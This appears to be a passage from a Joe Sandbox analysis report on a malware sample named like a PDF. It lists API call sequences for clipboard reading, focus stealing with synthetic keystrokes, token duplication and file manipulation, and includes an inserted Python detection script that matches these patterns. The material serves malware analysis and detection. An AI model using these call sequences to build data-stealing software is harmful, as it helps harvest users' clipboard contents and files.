                                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 003AF8DC
                                                    • GetWindowLongW.USER32(?,000000F0), ref: 003AF919
                                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 003AF940
                                                    • SendMessageW.USER32 ref: 003AF966
                                                    • _wcsncpy.LIBCMT ref: 003AF9D2
                                                    • GetKeyState.USER32(00000011), ref: 003AF9F3
                                                    • GetKeyState.USER32(00000009), ref: 003AFA00
                                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 003AFA16
                                                    • GetKeyState.USER32(00000010), ref: 003AFA20
                                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 003AFA4F
                                                    • SendMessageW.USER32 ref: 003AFA72
                                                    • SendMessageW.USER32(?,00001030,?,003AE059), ref: 003AFB6F
                                                    • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?,?), ref: 003AFB85
                                                    • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 003AFB96
                                                    • SetCapture.USER32(?), ref: 003AFB9F
                                                    • ClientToScreen.USER32(?,?), ref: 003AFC03
                                                    • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 003AFC0F
                                                    • InvalidateRect.USER32(?,00000000,00000001,?,?,?,?), ref: 003AFC29
                                                    • ReleaseCapture.USER32 ref: 003AFC34
                                                    • GetCursorPos.USER32(?), ref: 003AFC69
                                                    • ScreenToClient.USER32(?,?), ref: 003AFC76
                                                    • SendMessageW.USER32(?,00001012,00000000,?), ref: 003AFCD8
                                                    • SendMessageW.USER32 ref: 003AFD02
                                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 003AFD41
                                                    • SendMessageW.USER32 ref: 003AFD6C
                                                    • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 003AFD84
                                                    • SendMessageW.USER32(?,0000110B,00000009,?), ref: 003AFD8F
                                                    • GetCursorPos.USER32(?), ref: 003AFDB0
                                                    • ScreenToClient.USER32(?,?), ref: 003AFDBD
                                                    • GetParent.USER32(?), ref: 003AFDD9
                                                    • SendMessageW.USER32(?,00001012,00000000,?), ref: 003AFE3F
                                                    • SendMessageW.USER32 ref: 003AFE6F
                                                    • ClientToScreen.USER32(?,?), ref: 003AFEC5
                                                    • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 003AFEF1
                                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 003AFF19
                                                    • SendMessageW.USER32 ref: 003AFF3C
                                                    • ClientToScreen.USER32(?,?), ref: 003AFF86
                                                    • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 003AFFB6
                                                    • GetWindowLongW.USER32(?,000000F0), ref: 003B004B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                     • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$ClientScreen$Image$CursorDragList_LongStateWindow$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                    • String ID: @GUI_DRAGID$F
                                                    • API String ID: 2516578528-4164748364
                                                    • Opcode ID: 47a5629e018a1a254a852d665897c0028f442a72b037f5d84ef07854100d935f
                                                    • Instruction ID: 7e48fa315b0cefec426e224899ffbba37cadd92e0af3166b25bdd3c9c9591bb4
                                                    • Opcode Fuzzy Hash: 47a5629e018a1a254a852d665897c0028f442a72b037f5d84ef07854100d935f
                                                    • Instruction Fuzzy Hash: E632CC74604244AFDB22CFA4C884FAABBA8FF4A354F140A39F695872B1C731EC55CB51
                                                    APIs
                                                    • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 003AB1CD
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                     • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: MessageSend
                                                    • String ID: %d/%02d/%02d
                                                    • API String ID: 3850602802-328681919
                                                    • Opcode ID: 0bc8d4cf15070ba16a5dc00b9986324ac9a46724a6847701ee06393e58574efe
                                                    • Instruction ID: 0676c6f2c52ec27a23e5dd4b82adc61f65f349e0f1ce251bd16dc7c1dda97a8b
                                                    • Opcode Fuzzy Hash: 0bc8d4cf15070ba16a5dc00b9986324ac9a46724a6847701ee06393e58574efe
                                                    • Instruction Fuzzy Hash: F512BF71500608AFEB269F64CC49FAEBBB8FF46710F114229F915DB2E1DB709941CB11
                                                    APIs
                                                    • GetForegroundWindow.USER32(00000000,00000000), ref: 0035EB4A
                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 003B3AEA
                                                    • IsIconic.USER32(000000FF), ref: 003B3AF3
                                                    • ShowWindow.USER32(000000FF,00000009), ref: 003B3B00
                                                    • SetForegroundWindow.USER32(000000FF), ref: 003B3B0A
                                                    • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 003B3B20
                                                    • GetCurrentThreadId.KERNEL32 ref: 003B3B27
                                                    • GetWindowThreadProcessId.USER32(000000FF,00000000), ref: 003B3B33
                                                    • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 003B3B44
                                                    • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 003B3B4C
                                                    • AttachThreadInput.USER32(00000000,?,00000001), ref: 003B3B54
                                                    • SetForegroundWindow.USER32(000000FF), ref: 003B3B57
                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 003B3B6C
                                                    • keybd_event.USER32(00000012,00000000), ref: 003B3B77
                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 003B3B81
                                                    • keybd_event.USER32(00000012,00000000), ref: 003B3B86
                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 003B3B8F
                                                    • keybd_event.USER32(00000012,00000000), ref: 003B3B94
                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 003B3B9E
                                                    • keybd_event.USER32(00000012,00000000), ref: 003B3BA3
                                                    • SetForegroundWindow.USER32(000000FF), ref: 003B3BA6
                                                    • AttachThreadInput.USER32(000000FF,?,00000000), ref: 003B3BCD
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                     • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                    • String ID: Shell_TrayWnd
                                                    • API String ID: 4125248594-2988720461
                                                    • Opcode ID: f1d6193d5d3c0441805c0b0dd19f4ca616d91dd1951045c02b1997f879af7722
                                                    • Instruction ID: 75c41288045e8dae93a67328ab7b9054cdae322fec5a2fd96350fd2e7a3ffe29
                                                    • Opcode Fuzzy Hash: f1d6193d5d3c0441805c0b0dd19f4ca616d91dd1951045c02b1997f879af7722
                                                    • Instruction Fuzzy Hash: 40318771A403287BEB225F659C49FBF7E6CEB84B54F114025FB05EA1D0D6B16D10EBA0
                                                    APIs
                                                      • Part of subcall function 0037B134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0037B180
                                                      • Part of subcall function 0037B134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0037B1AD
                                                      • Part of subcall function 0037B134: GetLastError.KERNEL32 ref: 0037B1BA
                                                    • _memset.LIBCMT ref: 0037AD08
                                                    • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 0037AD5A
                                                    • CloseHandle.KERNEL32(?), ref: 0037AD6B
                                                    • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 0037AD82
                                                    • GetProcessWindowStation.USER32 ref: 0037AD9B
                                                    • SetProcessWindowStation.USER32(00000000), ref: 0037ADA5
                                                    • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 0037ADBF
                                                      • Part of subcall function 0037AB84: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,0037ACC0), ref: 0037AB99
                                                      • Part of subcall function 0037AB84: CloseHandle.KERNEL32(?,?,0037ACC0), ref: 0037ABAB
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                     • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                    • String ID: $H*?$default$winsta0
                                                    • API String ID: 2063423040-2897388558
                                                    • Opcode ID: b7c65176873776f7599144572452c6b45f685c6a93b8aa33f9af19222562ef56
                                                    • Instruction ID: 2f81ed0590f76539943918e0a34b078f637e1544a8293ab659d2183c87ced6c1
                                                    • Opcode Fuzzy Hash: b7c65176873776f7599144572452c6b45f685c6a93b8aa33f9af19222562ef56
                                                    • Instruction Fuzzy Hash: 9D819E71800209EFDF239FA4CC45EEEBB78EF48344F058129F918A6561D7399E54DB62
                                                    APIs
                                                      • Part of subcall function 00386EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00385FA6,?), ref: 00386ED8
                                                      • Part of subcall function 00386EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00385FA6,?), ref: 00386EF1
                                                      • Part of subcall function 0038725E: __wsplitpath.LIBCMT ref: 0038727B
                                                      • Part of subcall function 0038725E: __wsplitpath.LIBCMT ref: 0038728E
                                                      • Part of subcall function 003872CB: GetFileAttributesW.KERNEL32(?,00386019), ref: 003872CC
                                                    • _wcscat.LIBCMT ref: 00386149
                                                    • _wcscat.LIBCMT ref: 00386167
                                                    • __wsplitpath.LIBCMT ref: 0038618E
                                                    • FindFirstFileW.KERNEL32(?,?), ref: 003861A4
                                                    • _wcscpy.LIBCMT ref: 00386209
                                                    • _wcscat.LIBCMT ref: 0038621C
                                                    • _wcscat.LIBCMT ref: 0038622F
                                                    • lstrcmpiW.KERNEL32(?,?), ref: 0038625D
                                                    • DeleteFileW.KERNEL32(?), ref: 0038626E
                                                    • MoveFileW.KERNEL32(?,?), ref: 00386289
                                                    • MoveFileW.KERNEL32(?,?), ref: 00386298
                                                    • CopyFileW.KERNEL32(?,?,00000000), ref: 003862AD
                                                    • DeleteFileW.KERNEL32(?), ref: 003862BE
                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 003862E1
                                                    • FindClose.KERNEL32(00000000), ref: 003862FD
                                                    • FindClose.KERNEL32(00000000), ref: 0038630B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                     • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: File$Find_wcscat$__wsplitpath$CloseDeleteFullMoveNamePath$AttributesCopyFirstNext_wcscpylstrcmpi
                                                    • String ID: \*.*
                                                    • API String ID: 1917200108-1173974218
                                                    • Opcode ID: 892f8feb5541cda8dcaafecf56ceab97175285183cb7c6de6a174defa4b08d2b
                                                    • Instruction ID: b43a3e75efc78c7ab9368541ace232fa5474c8cc1aa914c931402a74ca30b203
                                                    • Opcode Fuzzy Hash: 892f8feb5541cda8dcaafecf56ceab97175285183cb7c6de6a174defa4b08d2b
                                                    • Instruction Fuzzy Hash: 7C51227280821C6ACB22FB91DC46DEF77BCAF05300F0945EAE585E7141DE76A7498FA4
                                                    APIs
                                                    • OpenClipboard.USER32(003DDC00), ref: 00396B36
                                                    • IsClipboardFormatAvailable.USER32(0000000D), ref: 00396B44
                                                    • GetClipboardData.USER32(0000000D), ref: 00396B4C
                                                    • CloseClipboard.USER32 ref: 00396B58
                                                    • GlobalLock.KERNEL32(00000000), ref: 00396B74
                                                    • CloseClipboard.USER32 ref: 00396B7E
                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00396B93
                                                    • IsClipboardFormatAvailable.USER32(00000001), ref: 00396BA0
                                                    • GetClipboardData.USER32(00000001), ref: 00396BA8
                                                    • GlobalLock.KERNEL32(00000000), ref: 00396BB5
                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00396BE9
                                                    • CloseClipboard.USER32 ref: 00396CF6
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                     • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                    • String ID:
                                                    • API String ID: 3222323430-0
                                                    • Opcode ID: ab5ee39a1c3f711a61c331987ed9ea34d1e00030563166066629c34ca9311b78
                                                    • Instruction ID: 06667a683c48bb94a1c55175f898984522ff46fa87ce709e1ba8d4f1a1f81ab5
                                                    • Opcode Fuzzy Hash: ab5ee39a1c3f711a61c331987ed9ea34d1e00030563166066629c34ca9311b78
                                                    • Instruction Fuzzy Hash: FA51AC31205201ABD703AF65DD96F6E77ACEF84B00F010429F696DA2E1EF70E905CB62
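The API sequences listed for this sample (the clipboard read directly above, the AttachThreadInput/keybd_event focus trick in the Shell_TrayWnd block, and the DuplicateTokenEx/winsta0/default setup in the window-station block) are the kind of pattern a detection engineer wants to pull out of such a report mechanically rather than by eye. The following is an added example and is not part of the Joe Sandbox report or of the analysed sample: a Python parser for the report's per-function "APIs" listing lines, plus an ordered-subsequence matcher for three call patterns. The technique names, the step lists and the argument checks (CF_UNICODETEXT = 0xD, CF_TEXT = 0x1, VK_MENU = 0x12) are this example's own assumptions, not Joe Sandbox signature names; the sample listings are lines copied from the blocks on this page.

```python
import re
from dataclasses import dataclass
from typing import Callable, Dict, List, Optional, Tuple

# Added example, not report code. A listing line looks like one of:
#   • OpenClipboard.USER32(003DDC00), ref: 00396B36
#   • CloseClipboard.USER32 ref: 00396B58
#     • Part of subcall function 0037B134: GetLastError.KERNEL32 ref: 0037B1BA
_CALL_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<mod>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)


@dataclass(frozen=True)
class ApiCall:
    api: str
    module: str
    args: Tuple[str, ...]
    ref: int                 # address of the call site
    subcall: Optional[int]   # callee address when the line is "Part of subcall function"


def parse_calls(listing: str) -> List[ApiCall]:
    """Extract API calls in listing order; headers such as 'APIs'/'Strings' are skipped."""
    calls = []
    for line in listing.splitlines():
        m = _CALL_RE.match(line)
        if not m:
            continue
        raw = m.group("args")
        args = tuple(a.strip() for a in raw.split(",")) if raw else ()
        sub = m.group("sub")
        calls.append(ApiCall(m.group("api"), m.group("mod").upper(), args,
                             int(m.group("ref"), 16), int(sub, 16) if sub else None))
    return calls


def _arg0_in(values: set) -> Callable[[Tuple[str, ...]], bool]:
    return lambda args: bool(args) and args[0].upper() in values


# Each technique is an ordered list of (API name, predicate on its arguments).
# Names and steps are this example's own choice (assumption), not sandbox signatures.
TECHNIQUES: Dict[str, List[Tuple[str, Optional[Callable]]]] = {
    # CF_UNICODETEXT (0xD) or CF_TEXT (0x1) fetched, then the handle locked to copy the bytes.
    "clipboard_read": [("OpenClipboard", None),
                       ("GetClipboardData", _arg0_in({"0000000D", "00000001"})),
                       ("GlobalLock", None), ("CloseClipboard", None)],
    # Attach to the target thread's input queue and synthesise Alt (VK_MENU = 0x12),
    # the usual way past the SetForegroundWindow lock.
    "foreground_steal": [("AttachThreadInput", None),
                         ("keybd_event", _arg0_in({"00000012"})),
                         ("SetForegroundWindow", None)],
    # Duplicate a token and open winsta0\default before running something as another user.
    "token_desktop_setup": [("DuplicateTokenEx", None),
                            ("OpenWindowStationW", _arg0_in({"WINSTA0"})),
                            ("SetProcessWindowStation", None),
                            ("OpenDesktopW", _arg0_in({"DEFAULT"}))],
}


def match_technique(calls: List[ApiCall], steps) -> Optional[List[int]]:
    """Return call-site refs if the steps occur in order (gaps allowed), else None."""
    pos, hits = 0, []
    for api, pred in steps:
        while pos < len(calls):
            call = calls[pos]
            pos += 1
            if call.api == api and (pred is None or pred(call.args)):
                hits.append(call.ref)
                break
        else:
            return None
    return hits


def find_techniques(listing: str) -> Dict[str, List[int]]:
    calls = parse_calls(listing)
    return {name: hits for name, steps in TECHNIQUES.items()
            for hits in [match_technique(calls, steps)] if hits}


# Sample input: lines copied from the listings on this page (clipboard, Shell_TrayWnd,
# window-station blocks), embedded here so the example runs offline.
CLIPBOARD_LISTING = """APIs
• OpenClipboard.USER32(003DDC00), ref: 00396B36
• IsClipboardFormatAvailable.USER32(0000000D), ref: 00396B44
• GetClipboardData.USER32(0000000D), ref: 00396B4C
• CloseClipboard.USER32 ref: 00396B58
• GlobalLock.KERNEL32(00000000), ref: 00396B74
• CloseClipboard.USER32 ref: 00396B7E
"""
FOREGROUND_LISTING = """• AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 003B3B44
• keybd_event.USER32(00000012,00000000), ref: 003B3B77
• SetForegroundWindow.USER32(000000FF), ref: 003B3BA6
• AttachThreadInput.USER32(000000FF,?,00000000), ref: 003B3BCD
"""
TOKEN_LISTING = """  • Part of subcall function 0037B134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0037B180
• DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 0037AD5A
• OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 0037AD82
• SetProcessWindowStation.USER32(00000000), ref: 0037ADA5
• OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 0037ADBF
"""

if __name__ == "__main__":
    for label, text in (("clipboard", CLIPBOARD_LISTING), ("foreground", FOREGROUND_LISTING),
                        ("token", TOKEN_LISTING)):
        print(label, {k: [hex(r) for r in v] for k, v in find_techniques(text).items()})
```

The matcher deliberately allows gaps between steps, since the report interleaves helper calls (IsClipboardFormatAvailable, MapVirtualKeyW) with the ones that matter; what it does not allow is reordering, so a function that locks a global before touching the clipboard is not flagged. The returned refs are the call-site addresses from the listing, which is what you would hand to someone opening the dump in IDA.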
                                                    APIs
                                                    • FindFirstFileW.KERNEL32(?,?), ref: 0038F62B
                                                    • FindClose.KERNEL32(00000000), ref: 0038F67F
                                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0038F6A4
                                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0038F6BB
                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 0038F6E2
                                                    • __swprintf.LIBCMT ref: 0038F72E
                                                    • __swprintf.LIBCMT ref: 0038F767
                                                    • __swprintf.LIBCMT ref: 0038F7BB
                                                      • Part of subcall function 0036172B: __woutput_l.LIBCMT ref: 00361784
                                                    • __swprintf.LIBCMT ref: 0038F809
                                                    • __swprintf.LIBCMT ref: 0038F858
                                                    • __swprintf.LIBCMT ref: 0038F8A7
                                                    • __swprintf.LIBCMT ref: 0038F8F6
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                     • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: __swprintf$FileTime$FindLocal$CloseFirstSystem__woutput_l
                                                    • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                    • API String ID: 835046349-2428617273
                                                    • Opcode ID: 25ab6d3c59b022954b93a7869f7bf3cf23b685ac66e49afe79c4c990ec97ee22
                                                    • Instruction ID: 742999cb9fa96a2c57aba02c127b0606c104cc507fc28823e6873e47d5e2298b
                                                    • Opcode Fuzzy Hash: 25ab6d3c59b022954b93a7869f7bf3cf23b685ac66e49afe79c4c990ec97ee22
                                                    • Instruction Fuzzy Hash: 8FA110B2408344ABC352EB94C885DAFB7ECAF98705F444D2EF585CA152EB34E949C762
                                                    APIs
                                                    • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00391B50
                                                    • _wcscmp.LIBCMT ref: 00391B65
                                                    • _wcscmp.LIBCMT ref: 00391B7C
                                                    • GetFileAttributesW.KERNEL32(?), ref: 00391B8E
                                                    • SetFileAttributesW.KERNEL32(?,?), ref: 00391BA8
                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 00391BC0
                                                    • FindClose.KERNEL32(00000000), ref: 00391BCB
                                                    • FindFirstFileW.KERNEL32(*.*,?), ref: 00391BE7
                                                    • _wcscmp.LIBCMT ref: 00391C0E
                                                    • _wcscmp.LIBCMT ref: 00391C25
                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00391C37
                                                    • SetCurrentDirectoryW.KERNEL32(003F39FC), ref: 00391C55
                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 00391C5F
                                                    • FindClose.KERNEL32(00000000), ref: 00391C6C
                                                    • FindClose.KERNEL32(00000000), ref: 00391C7C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                     • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                    • String ID: *.*
                                                    • API String ID: 1803514871-438819550
                                                    • Opcode ID: 3e02f061eba18493177d0a6af5e8b49c96fd8d0d4a6f9378eee7b911718332c4
                                                    • Instruction ID: 4553d73e19d503c10d574b26e8584c90484f702f1e56bbdb2301ae52bff8018c
                                                    • Opcode Fuzzy Hash: 3e02f061eba18493177d0a6af5e8b49c96fd8d0d4a6f9378eee7b911718332c4
                                                    • Instruction Fuzzy Hash: 6F31C23254021A6BDF23EBB4EC49EEE77AC9F05320F1545A6F915E3090EB70EA458F64
                                                    APIs
                                                    • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00391CAB
                                                    • _wcscmp.LIBCMT ref: 00391CC0
                                                    • _wcscmp.LIBCMT ref: 00391CD7
                                                      • Part of subcall function 00386BD4: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00386BEF
                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 00391D06
                                                    • FindClose.KERNEL32(00000000), ref: 00391D11
                                                    • FindFirstFileW.KERNEL32(*.*,?), ref: 00391D2D
                                                    • _wcscmp.LIBCMT ref: 00391D54
                                                    • _wcscmp.LIBCMT ref: 00391D6B
                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00391D7D
                                                    • SetCurrentDirectoryW.KERNEL32(003F39FC), ref: 00391D9B
                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 00391DA5
                                                    • FindClose.KERNEL32(00000000), ref: 00391DB2
                                                    • FindClose.KERNEL32(00000000), ref: 00391DC2
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                     • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                    • String ID: *.*
                                                    • API String ID: 1824444939-438819550
                                                    • Opcode ID: 7ee6044281470cda1de8bf2fa672967b2536fa43cf7f2bf475e7f77f2b442a50
                                                    • Instruction ID: 1b7d5a0bf39d7d410613f7bd01548c796c2e29c260efdcf815f922e0c42d9e09
                                                    • Opcode Fuzzy Hash: 7ee6044281470cda1de8bf2fa672967b2536fa43cf7f2bf475e7f77f2b442a50
                                                    • Instruction Fuzzy Hash: A631FE3250061B6ADF23EBA0EC09EEE77AC9F05324F1545A5F901F61A1DB70EE458B64
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                     • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
